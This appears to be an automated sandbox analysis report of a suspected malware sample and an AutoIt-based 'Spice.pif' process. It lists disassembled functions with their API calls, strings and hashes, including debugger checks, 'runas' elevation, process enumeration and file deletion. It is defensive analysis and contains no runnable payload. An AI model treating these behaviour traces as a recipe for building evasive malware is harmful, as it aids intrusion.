String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4083868402
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426

Strings

: Completed, xrefs: 004063DC

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32(?), ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4083868402
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E38

Strings

C:\Users\user\Desktop, xrefs: 00405E22

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1876063424
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Spice.pifPID: 752, Parent PID: 6452COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	116

Executed Functions

Function 00E85240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8526C
IsDebuggerPresent.KERNEL32 ref: 00E8527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E852E6

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Part of subcall function 00E7BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E7BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00E85366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00EC0B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F26D10), ref: 00EC0BE9
ShellExecuteW.SHELL32(00000000), ref: 00EC0BF0

Part of subcall function 00E8514C: GetSysColorBrush.USER32(0000000F), ref: 00E85156
Part of subcall function 00E8514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E85165
Part of subcall function 00E8514C: LoadIconW.USER32(00000063), ref: 00E8517C
Part of subcall function 00E8514C: LoadIconW.USER32(000000A4), ref: 00E8518E
Part of subcall function 00E8514C: LoadIconW.USER32(000000A2), ref: 00E851A0
Part of subcall function 00E8514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E851C6
Part of subcall function 00E8514C: RegisterClassExW.USER32(?), ref: 00E8521C

Part of subcall function 00E850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E85109
Part of subcall function 00E850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E8512A
Part of subcall function 00E850DB: ShowWindow.USER32(00000000), ref: 00E8513E
Part of subcall function 00E850DB: ShowWindow.USER32(00000000), ref: 00E85147

Part of subcall function 00E859D3: _memset.LIBCMT ref: 00E859F9
Part of subcall function 00E859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E85A9E

Strings

runas, xrefs: 00EC0BE4
AutoIt, xrefs: 00EC0B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00EC0B28

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 84f172548eae7d420b50ab3e6fe537f7697114c96592a238d73555be9f99a4b8
Instruction ID: d5e85586c533b29a718cd606ec71b2fa7efea8ad2b4856c185a0649fe8ff5130
Opcode Fuzzy Hash: 84f172548eae7d420b50ab3e6fe537f7697114c96592a238d73555be9f99a4b8
Instruction Fuzzy Hash: C851177190834CEACB21FBB0DC05EFE7BB9AB05754F1060A9F45DB2162CE759906EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E85D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E85D40

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

GetCurrentProcess.KERNEL32(?,00F00A18,00000000,00000000,?), ref: 00E85E07
IsWow64Process.KERNEL32(00000000), ref: 00E85E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00E85E54
FreeLibrary.KERNEL32(00000000), ref: 00E85E5F
GetSystemInfo.KERNEL32(00000000), ref: 00E85E90
GetSystemInfo.KERNEL32(00000000), ref: 00E85E9C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b0450facc7effc1ccfc30c9675933f76444ac12b47750d15f945510652b6e5e6
Instruction ID: 04bfd96f7002703c18247762c97e43146d3ba963542298759436638cec5e81c9
Opcode Fuzzy Hash: b0450facc7effc1ccfc30c9675933f76444ac12b47750d15f945510652b6e5e6
Instruction Fuzzy Hash: C4912532549BC0DEC731DB7885515ABBFE57F2A300F881A9ED0CFA3A02D631A548D759

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4

Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED

FindFirstFileW.KERNEL32(?,?), ref: 00ED407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00ED40CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED40DD
FindClose.KERNEL32(00000000), ref: 00ED40F4
FindClose.KERNEL32(00000000), ref: 00ED40FD

Strings

\*.*, xrefs: 00ED404E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 797f17c77ebcddf6ba0f228990afc06e47848f4559e4246ae4f3b414f7b121d2
Instruction ID: 142f88a87c152baeaadd8bf37452f6c4495fe86d79d544115f00417ea2e4df0c
Opcode Fuzzy Hash: 797f17c77ebcddf6ba0f228990afc06e47848f4559e4246ae4f3b414f7b121d2
Instruction Fuzzy Hash: F43183710083459BC705FB60D8959AFB7ECBEA5304F441A5EF4D9A22D2DB30D90ADB53

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00ED416D
Process32FirstW.KERNEL32(00000000,?), ref: 00ED417B
Process32NextW.KERNEL32(00000000,?), ref: 00ED419B
FindCloseChangeNotification.KERNEL32(00000000), ref: 00ED4245

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 836bd358b460a0a97ad9dae8d7223b571adfe0442a93dcb7be3d28c7c828b9a5
Instruction ID: 488f99078f4069f42c3833bd305f8c6fbdd64ce4dfe939c213db223439ecdbe9
Opcode Fuzzy Hash: 836bd358b460a0a97ad9dae8d7223b571adfe0442a93dcb7be3d28c7c828b9a5
Instruction Fuzzy Hash: AF3181711083419FD304EF50E885AAEBBE8FFA5354F10152EF589A22E1EB71994ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E7B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00E83740: CharUpperBuffW.USER32(?,00F371DC,00000000,?,00000000,00F371DC,?,00E753A5,?,?,?,?), ref: 00E8375D

_memmove.LIBCMT ref: 00E7B68A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: d8b443c8217036bdf39ff26f93701f80cb6611f54c86103b047e0cd770265416
Instruction ID: 5d32d71330134638909d085f80f75bc7939374eccc62672c2e3cfbb193acdc25
Opcode Fuzzy Hash: d8b443c8217036bdf39ff26f93701f80cb6611f54c86103b047e0cd770265416
Instruction Fuzzy Hash: F5A276706083419FC720DF28C481B6BB7E5BF84308F14A96DE89AAB361D771ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00ED494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00EBFC86), ref: 00ED495A
FindFirstFileW.KERNEL32(?,?), ref: 00ED496B
FindClose.KERNEL32(00000000), ref: 00ED497B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a1f83a165f71bcf1ff3f872e790d6f45f93f917c6176e3ce1972501fa496a496
Instruction ID: 2e6a084fd8bebe708e3002fb4448109bf548864c8a6bf6cb0663bc9618e19a3e
Opcode Fuzzy Hash: a1f83a165f71bcf1ff3f872e790d6f45f93f917c6176e3ce1972501fa496a496
Instruction Fuzzy Hash: 23E0DF7191050AABC3106738EC0D9EA776CEF96339F100706F835D22E0EF709944A6D6

Uniqueness

Uniqueness Score: -1.00%

Function 00E794E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65a78a2f509c60397ee76b6530a18d160e4689246abfa51b7180c94ed958e26
Instruction ID: 2ded578841a8b4e96391515d53a0be7ecbcee2b830f95b4a13f052a771e1610e
Opcode Fuzzy Hash: c65a78a2f509c60397ee76b6530a18d160e4689246abfa51b7180c94ed958e26
Instruction Fuzzy Hash: DF22AD74A00216CFDB24DF68C480AAEB7F0FF45304F14D16AE95ABB352E775A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E7BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E7BF57

Part of subcall function 00E752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6

Sleep.KERNEL32(0000000A,?,?), ref: 00EB36B5

Strings

@GUI_WINHANDLE, xrefs: 00EB37C1
@COM_EVENTOBJ, xrefs: 00EB3D2E
@GUI_CTRLHANDLE, xrefs: 00EB3816
@GUI_CTRLID, xrefs: 00EB376C
@TRAY_ID, xrefs: 00EB3FCD
CALL, xrefs: 00E7C277

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
